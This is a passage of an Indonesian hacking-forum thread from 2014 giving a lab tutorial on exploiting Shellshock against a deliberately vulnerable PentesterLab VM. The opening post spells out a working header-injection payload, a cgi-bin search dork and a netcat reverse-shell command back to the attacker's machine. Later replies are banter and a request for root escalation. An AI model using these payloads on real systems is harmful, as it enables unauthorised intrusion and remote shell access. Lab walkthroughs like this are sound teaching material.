Share Exploitasi Shellshock Vulnerability - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +--- Thread: Share Exploitasi Shellshock Vulnerability (/thread-6083.html) Pages:
1
2
|
Exploitasi Shellshock Vulnerability - jrs_faisal - 11-14-2014 Ini adalah materi dari sub regional sub solo bulan september kemarin, langsung aja bagaimana cara exploitasi celah yang begitu hot2nya pada bulan september. 1. Untuk melakukan pengujian shellshock secara legal, download ISO dari Pentesterlab dimana di ISO tersebut memiliki kerentanan yaitu Shellshock. Download disini CVE-2014-6271 vulnerable VM 2. Setelah didownload, buka menggunakan VMware, kemudian setting IP dan Netmasknya. Contoh : ifconfig eth0 172.16.208.20 netmask 255.255.255.0 3. Setelah itu ,akses IP tadi dari sisi client / Attacker. 4. Mengakses cgi-bin ,dimana shellshock bisa dieksploitasi dari sisi webserver apabila web tersebut memiliki cgi-bin yang aktif. Untuk dork cgi-bin bisa gunakanan ini : Code: /cgi-sys/entropysearch.cgi 5. Untuk menguji apakah target vulner terhadap shellsock, saya mencoba dengan menerapkan firewall log icmp ,agar ketika saya melakukan injeksi dengan perintah ping dapat terlog oleh system saya. 6. Buka Live Http header ( Add Ons Mozilla Firefox ) 7. Pada bagian User-Agent saya ganti dengan injeksi shellshock, berikut injeksinya () { :;}; /bin/bash -c “ping 172.16.208.2” IP 172.16.208.2 adalah IP Laptop saya. Kemudian Klick Replay pada Live HTTP Headernya. 8. Melakukan cek log apakah ada protocol icmp ( ping ) yang masuk , tail -f /var/log/messages 9. Saya mendapatkan log dimana SRC 172.16.208.20 dengan DST 172.16.208.2 berhubungan melalui protocol ICMP. Dengan begini, berarti injeksi tadi berhasil dan system target mempunyai vulner shellshock. 10. Mencoba melakukan BACK-CONNECT dengan NC untuk mendapatkan akses Shell. 11. Saya membuat listening terlebih dahulu menggunakan NC. 12. Kemudian kembali ke Live HTTP Header dan masukan injeksi ini : () { :;}; /bin/bash -c “nc 172.16.208.2 4444 –e /bin/bash -i” Kemudian klick replay. 13. Dan ,saya mendapatkan akses shell lewat NC. 14. Untuk mendapatkan akses root, kita bisa melakukannya dengan local root exploit. RE: Exploitasi Shellshock Vulnerability - gnome_selpa - 11-14-2014 wow, pinjem vps dong biar maknyus RE: Exploitasi Shellshock Vulnerability - gnome_selpa - 11-14-2014 +1 untuk anda pak gitukan pak @ino_ot hahahahaha RE: Exploitasi Shellshock Vulnerability - ino_ot - 11-14-2014 (11-14-2014, 08:40 PM)gnome_selpa Wrote: +1 untuk anda pak wkwkkwkww manteb dah ,.,. serasa jadi formal banget di forum pak -_- RE: Exploitasi Shellshock Vulnerability - gnome_selpa - 11-14-2014 (11-14-2014, 09:29 PM)ino_ot Wrote:Lah siapa yang ngajarin huahahaha... udah ah, gw mau bobok duluan(11-14-2014, 08:40 PM)gnome_selpa Wrote: +1 untuk anda pak RE: Exploitasi Shellshock Vulnerability - sonyrimawan - 11-15-2014 joss threadnya +1 dari ane. salam kenal. ane dari region semarang RE: Exploitasi Shellshock Vulnerability - jrs_faisal - 11-15-2014 (11-15-2014, 02:11 AM)sonyrimawan Wrote: joss threadnyaMaturnuwun om, siap salam kenal juga RE: Exploitasi Shellshock Vulnerability - tirtana - 11-15-2014 om,, rquest sklian root nya donk,,, biar dapet akses root ya sklian... RE: Exploitasi Shellshock Vulnerability - jrs_faisal - 11-24-2014 (11-15-2014, 01:43 PM)tirtana Wrote: om,, rquest sklian root nya donk,,,ini simulasinya di iso penteserlab om ,cuman su - udah dpt root akses. Kalo di linux lainnya butuh local root exploit, dan beda kernel beda exploitnya. RE: Exploitasi Shellshock Vulnerability - abdilahrf - 11-24-2014 @jrs_faisal : threadnya kemana :v ngilang :3 |